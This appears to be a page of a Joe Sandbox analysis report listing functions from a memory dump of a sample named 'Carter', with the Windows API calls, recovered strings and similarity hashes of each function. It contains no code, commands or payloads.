Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: fb03cc28c621c4a122b5ab41814ace0a9efee35a3711ae8d8803b94dafe9d46c
Instruction ID: c4729f34c2894ba0344c44bd3b7a3fc152224e2045a7fdb489dbdff5f93cd4e2
Opcode Fuzzy Hash: fb03cc28c621c4a122b5ab41814ace0a9efee35a3711ae8d8803b94dafe9d46c
Instruction Fuzzy Hash: FC616F75944208AFDB10DF64CC85EEEBBF8EB09710F104195FA15A72E1DB70AE41DB50

Function 00AD77B6 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00AD77DD
SafeArrayAllocData.OLEAUT32(?), ref: 00AD7836
VariantInit.OLEAUT32(?), ref: 00AD7848
SafeArrayAccessData.OLEAUT32(?,?), ref: 00AD7868
VariantCopy.OLEAUT32(?,?), ref: 00AD78BB
SafeArrayUnaccessData.OLEAUT32(?), ref: 00AD78CF
VariantClear.OLEAUT32(?), ref: 00AD78E4
SafeArrayDestroyData.OLEAUT32(?), ref: 00AD78F1
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AD78FA
VariantClear.OLEAUT32(?), ref: 00AD790C
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00AD7917

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 6c6e9103dd8b4c16b54752c80708cf6f9f4e669e5832618072ebe741fde81d59
Instruction ID: fec05702a363486291d8a74a493e2352e44daccbd554f0e26a5e25e219a29b0e
Opcode Fuzzy Hash: 6c6e9103dd8b4c16b54752c80708cf6f9f4e669e5832618072ebe741fde81d59
Instruction Fuzzy Hash: DC415235A041199FCB04EFA4D8889EDBBB9FF48340F40C069E956A7361DB70AA85CF90

Function 00AE0508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00AE0530
GetAsyncKeyState.USER32(000000A0), ref: 00AE05B1
GetKeyState.USER32(000000A0), ref: 00AE05CC
GetAsyncKeyState.USER32(000000A1), ref: 00AE05E6
GetKeyState.USER32(000000A1), ref: 00AE05FB
GetAsyncKeyState.USER32(00000011), ref: 00AE0613
GetKeyState.USER32(00000011), ref: 00AE0625
GetAsyncKeyState.USER32(00000012), ref: 00AE063D
GetKeyState.USER32(00000012), ref: 00AE064F
GetAsyncKeyState.USER32(0000005B), ref: 00AE0667
GetKeyState.USER32(0000005B), ref: 00AE0679

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 9e58867c8c5ec4b98c52353e15eb6476534b77dcec92489642d98ade6125d252
Instruction ID: a8f861f2c5411b2feca859db13d38fa68a65b3c9dba653dbe9e8d158cd62b548
Opcode Fuzzy Hash: 9e58867c8c5ec4b98c52353e15eb6476534b77dcec92489642d98ade6125d252
Instruction Fuzzy Hash: 6541D7305047CA6DFF319B658804BB6BEA16B61304F48C05AD9C6575C2EBE899D8CFB2

Function 00AF8AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC

CoInitialize.OLE32 ref: 00AF8AED
CoUninitialize.OLE32 ref: 00AF8AF8
CoCreateInstance.OLE32(?,00000000,00000017,00B13BBC,?), ref: 00AF8B58
IIDFromString.OLE32(?,?), ref: 00AF8BCB
VariantInit.OLEAUT32(?), ref: 00AF8C65
VariantClear.OLEAUT32(?), ref: 00AF8CC6

Strings

NULL Pointer assignment, xrefs: 00AF8B9D
Invalid parameter, xrefs: 00AF8BE4
Failed to create object, xrefs: 00AF8B63, 00AF8C19

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 6a8dabc463d52e8fbdc69c0f2e6f4673c3cebe08831584d197672a04435d5ff0
Instruction ID: 590b3be31264fbd2ae6788591ff22ec4248c7c73d93c77c27d87d32b88b1d917
Opcode Fuzzy Hash: 6a8dabc463d52e8fbdc69c0f2e6f4673c3cebe08831584d197672a04435d5ff0
Instruction Fuzzy Hash: B061AF702087159FC710EF94C988F6EB7E4AF49714F104849FA859B291DB78ED49CBA2

Function 00AEBB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AEBB13
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00AEBB89
GetLastError.KERNEL32 ref: 00AEBB93
SetErrorMode.KERNEL32(00000000,READY), ref: 00AEBC00

Strings

INVALID, xrefs: 00AEBBD2
UNKNOWN, xrefs: 00AEBBB8
READY, xrefs: 00AEBBD9
READONLY, xrefs: 00AEBBCB
NOTREADY, xrefs: 00AEBBBF

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 2789685b497c826d158cbcd15b8d26ddd46bfd94f0aa39b0e6bfd56392e01ef9
Instruction ID: e1341a57840656949638470e363ad23539eb7ef802b69b5940b4bcd423d60c86
Opcode Fuzzy Hash: 2789685b497c826d158cbcd15b8d26ddd46bfd94f0aa39b0e6bfd56392e01ef9
Instruction Fuzzy Hash: 7531B735A10249AFCB10EF66C949EAEB7B4EF44310F24815AF505DB295DB709D41CBA1

Function 00AD9B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00AD9BCC
GetDlgCtrlID.USER32 ref: 00AD9BD7
GetParent.USER32 ref: 00AD9BF3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AD9BF6
GetDlgCtrlID.USER32(?), ref: 00AD9BFF
GetParent.USER32(?), ref: 00AD9C1B
SendMessageW.USER32(00000000,?,?,00000111), ref: 00AD9C1E

Strings

ListBox, xrefs: 00AD9B89
ComboBox, xrefs: 00AD9B54

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: cdac735a7b707e97617b209e70c4c303f984a7f5cd24c839edc14cc3c29f3366
Instruction ID: b5fbef77746939a958c1e7e4f83a6e4efb8c025826b99e43cd00f6fc34dc1f8f
Opcode Fuzzy Hash: cdac735a7b707e97617b209e70c4c303f984a7f5cd24c839edc14cc3c29f3366
Instruction Fuzzy Hash: D421CF74A00204BFCF04ABA0CC85EFEBBB9EF95310F604156F962932A1DF759865DA20

Function 00AD9C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00AD9CB5
GetDlgCtrlID.USER32 ref: 00AD9CC0
GetParent.USER32 ref: 00AD9CDC
SendMessageW.USER32(00000000,?,00000111,?), ref: 00AD9CDF
GetDlgCtrlID.USER32(?), ref: 00AD9CE8
GetParent.USER32(?), ref: 00AD9D04
SendMessageW.USER32(00000000,?,?,00000111), ref: 00AD9D07

Strings

ListBox, xrefs: 00AD9C74
ComboBox, xrefs: 00AD9C3F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: d020fb602625e2d311dbe3565e4c408f49d8fb87b82e2800cdf7ff0c9eca5bad
Instruction ID: f247a370841d67b0fb90f1ea3f48909e1796174b22da7d939d9f908b0a5e4dbf
Opcode Fuzzy Hash: d020fb602625e2d311dbe3565e4c408f49d8fb87b82e2800cdf7ff0c9eca5bad
Instruction Fuzzy Hash: 3921D075E40204BFDF00ABA0CC85EFEBBB9EF94300F604016F952A32A1DF758965DA20

Function 00AF8F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AF8FC1
CoInitialize.OLE32(00000000), ref: 00AF8FEE
CoUninitialize.OLE32 ref: 00AF8FF8
GetRunningObjectTable.OLE32(00000000,?), ref: 00AF90F8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00AF9225
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00B13BDC), ref: 00AF9259
CoGetObject.OLE32(?,00000000,00B13BDC,?), ref: 00AF927C
SetErrorMode.KERNEL32(00000000), ref: 00AF928F
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00AF930F
VariantClear.OLEAUT32(?), ref: 00AF931F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 80c88fc61d0f37c145037963ff4af728363e610c1478e7d7f27f2b965612fdce
Instruction ID: 7aa17d8429b8a648fe287459863f3db9e709064e2e4d59c0856b1cefaaf47f17
Opcode Fuzzy Hash: 80c88fc61d0f37c145037963ff4af728363e610c1478e7d7f27f2b965612fdce
Instruction Fuzzy Hash: 06C13971608309AFC700EF68C884A6BB7E9FF89748F00495DF68A9B251DB71ED45CB52

Function 00AE19CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00AE19EF
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A03
GetWindowThreadProcessId.USER32(00000000), ref: 00AE1A0A
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A19
GetWindowThreadProcessId.USER32(?,00000000), ref: 00AE1A2B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A44
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A56
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1A9B
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1AB0
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00AE0A67,?,00000001), ref: 00AE1ABB

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: b86bf92fdc7729e679b368a6dca7b33fc441235eb5cf539d04630c883406b489
Instruction ID: f28ed71d283426c6876d3f16e8fbe015d10f3e20a17b05f464b0d3a538d66940
Opcode Fuzzy Hash: b86bf92fdc7729e679b368a6dca7b33fc441235eb5cf539d04630c883406b489
Instruction Fuzzy Hash: 0231EE79611254BFEB20AF11DC88FBD37AAFB56399F908125F800C7190CFB49E848B20

Function 00ABC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00A8260D
SetTextColor.GDI32(?,000000FF), ref: 00A82617
SetBkMode.GDI32(?,00000001), ref: 00A8262C
GetStockObject.GDI32(00000005), ref: 00A82634
GetClientRect.USER32(?), ref: 00ABC0FC
SendMessageW.USER32(?,00001328,00000000,?), ref: 00ABC113
GetWindowDC.USER32(?), ref: 00ABC11F
GetPixel.GDI32(00000000,?,?), ref: 00ABC12E
ReleaseDC.USER32(?,00000000), ref: 00ABC140
GetSysColor.USER32(00000005), ref: 00ABC15E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 53965652112e65e16fe060db4b7d515dc4a22f9cca117dd83a982178730d7582
Instruction ID: 6c8ce6449cb824b1470042c96f1ee9f606bbca0ba730e6fa0b904e5e5e26206d
Opcode Fuzzy Hash: 53965652112e65e16fe060db4b7d515dc4a22f9cca117dd83a982178730d7582
Instruction Fuzzy Hash: 28116D31510205FFDB616FA4EC48BE97BB6EB14331F508225FA65A60E1CFB10A91EF10

Function 00A8AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A8ADE1
OleUninitialize.OLE32(?,00000000), ref: 00A8AE80
UnregisterHotKey.USER32(?), ref: 00A8AFD7
DestroyWindow.USER32(?), ref: 00AC2F64
FreeLibrary.KERNEL32(?), ref: 00AC2FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AC2FF6

Strings

close all, xrefs: 00A8ADDC

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: b0cf276d48b197a67e7ae36e8bbdf377f0df097a925881df2b2ed69f36b54d84
Instruction ID: 4e84b5c44b242d32c18d6d673aa6f4ba811e96c8fabb4b06b7c38bc6221c013c
Opcode Fuzzy Hash: b0cf276d48b197a67e7ae36e8bbdf377f0df097a925881df2b2ed69f36b54d84
Instruction Fuzzy Hash: 83A16A317012228FDB29EF14C594F69F3B4BF14700F5582ADE90AAB261DB31AD52CF91

Function 00ADAD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00ADB13A), ref: 00ADB078

Strings

TEXT, xrefs: 00ADAFAF
REGEXPCLASS, xrefs: 00ADAE3D
CLASS, xrefs: 00ADADF7
INSTANCE, xrefs: 00ADAF86
CLASSNN, xrefs: 00ADAE1A
NAME, xrefs: 00ADAEAA

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 3b5ca977f8f6b7ca0891d187941ea96b96cd23ed6e396677cf026d3f1f7f67cd
Instruction ID: 42ebf2e2bbff0452e6724f194638582eb8543fca84b8cf1442b5e4f1cc5bbbfc
Opcode Fuzzy Hash: 3b5ca977f8f6b7ca0891d187941ea96b96cd23ed6e396677cf026d3f1f7f67cd
Instruction Fuzzy Hash: 3B918471600606EACB18EF60C581BEEFBB5BF15300F64815AE85BA7391DF306959CBA1

Function 00A831F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00A8327E

Part of subcall function 00A8218F: GetClientRect.USER32(?,?), ref: 00A821B8
Part of subcall function 00A8218F: GetWindowRect.USER32(?,?), ref: 00A821F9
Part of subcall function 00A8218F: ScreenToClient.USER32(?,?), ref: 00A82221

GetDC.USER32 ref: 00ABD073
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00ABD086
SelectObject.GDI32(00000000,00000000), ref: 00ABD094
SelectObject.GDI32(00000000,00000000), ref: 00ABD0A9
ReleaseDC.USER32(?,00000000), ref: 00ABD0B1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00ABD13C

Strings

U, xrefs: 00ABD011

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 705e76d7f300b65678f5ccf545791f288fc8069589672c9109595860a75657c9
Instruction ID: 12e9c3be6fddc806db09ca1888516be3bf90d4f3da6a6f1f5f7b224e5444841a
Opcode Fuzzy Hash: 705e76d7f300b65678f5ccf545791f288fc8069589672c9109595860a75657c9
Instruction Fuzzy Hash: 5871E331404205EFCF21EF68C884AFA7BB9FF59320F144269ED565A1A6EB318D51DF60

Function 00B0C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3

Part of subcall function 00A82714: GetCursorPos.USER32(?), ref: 00A82727
Part of subcall function 00A82714: ScreenToClient.USER32(00B477B0,?), ref: 00A82744
Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000001), ref: 00A82769
Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000002), ref: 00A82777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00B0C69C
ImageList_EndDrag.COMCTL32 ref: 00B0C6A2
ReleaseCapture.USER32 ref: 00B0C6A8
SetWindowTextW.USER32(?,00000000), ref: 00B0C752
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B0C765
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00B0C847

Strings

@GUI_DROPID, xrefs: 00B0C799
@GUI_DRAGFILE, xrefs: 00B0C7DC

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 0d6ebe2d0d424fc4095bf82cdc45d88b99bed7ede990a46d737d4c3d2f9b4434
Instruction ID: 8e0da3b8ca6e79d8349a3b1be9509c97ce99a3c53466f0ebab2c3aa49a30e52b
Opcode Fuzzy Hash: 0d6ebe2d0d424fc4095bf82cdc45d88b99bed7ede990a46d737d4c3d2f9b4434
Instruction Fuzzy Hash: 6C517875208305AFDB14EF24CC5AFAA7BE1FB88310F108A59F595872E1DB70AA45CB52

Function 00AF20E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00AF211C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00AF2148
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00AF218A
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00AF219F
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AF21AC
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00AF21DC
InternetCloseHandle.WININET(00000000), ref: 00AF2223

Part of subcall function 00AF2B4F: GetLastError.KERNEL32(?,?,00AF1EE3,00000000,00000000,00000001), ref: 00AF2B64
Part of subcall function 00AF2B4F: SetEvent.KERNEL32(?,?,00AF1EE3,00000000,00000000,00000001), ref: 00AF2B79

Strings

, xrefs: 00AF21CD

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
